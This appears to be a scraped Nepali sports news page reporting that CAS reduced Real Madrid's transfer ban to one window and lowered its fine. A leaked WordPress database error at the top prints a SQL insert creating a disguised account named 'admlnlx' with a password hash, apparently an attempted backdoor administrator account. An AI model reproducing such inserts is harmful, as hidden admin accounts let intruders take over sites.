WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvsP5TUaBjpwoyJYp/jGX3HvadGw/8.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:29:46', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ६–
रियल मड्रिडमाथि नयाँ खेलाडी अनुबन्ध गर्न लागेको प्रतिबन्धको समय घटेको छ।
यसअघि फिफाले रियल मड्रिडमाथि दुई ट्रान्सफर विन्डोमा नयाँ खेलाडी अनुबन्ध गर्न नपाउने गरी प्रतिबन्ध लगाएको थियो । तर क्लबको अपिलमाथि सुनुवाई गर्दै प्रतिबन्ध एक ट्रान्सफर विन्डोमा सीमित गरिएको समाचारमा जनाइएको छ।
रियल मड्रिडले खेल अदालत क्यासमा अपिल गरेको थियो । क्यासले प्रतिबन्ध एक विन्डोमा सीमित गर्न आदेश दिएको हो।
यस्तै क्लबले तिर्नु पर्ने जरिवाना रकम पनि दुई लाख ८२ हजार पाउण्डबाट एक लाख ८८ हजार पाउण्डमा घटेको छ। १८ वर्ष भन्दा कम उमेरका अन्तर्राष्ट्रिय खेलाडीको किनबेचमा नियम उल्लंघन गरेकाले रियल मड्रिड तथा एथ्लेटिको मड्रिडमाथि प्रतिबन्ध लागेको हो ।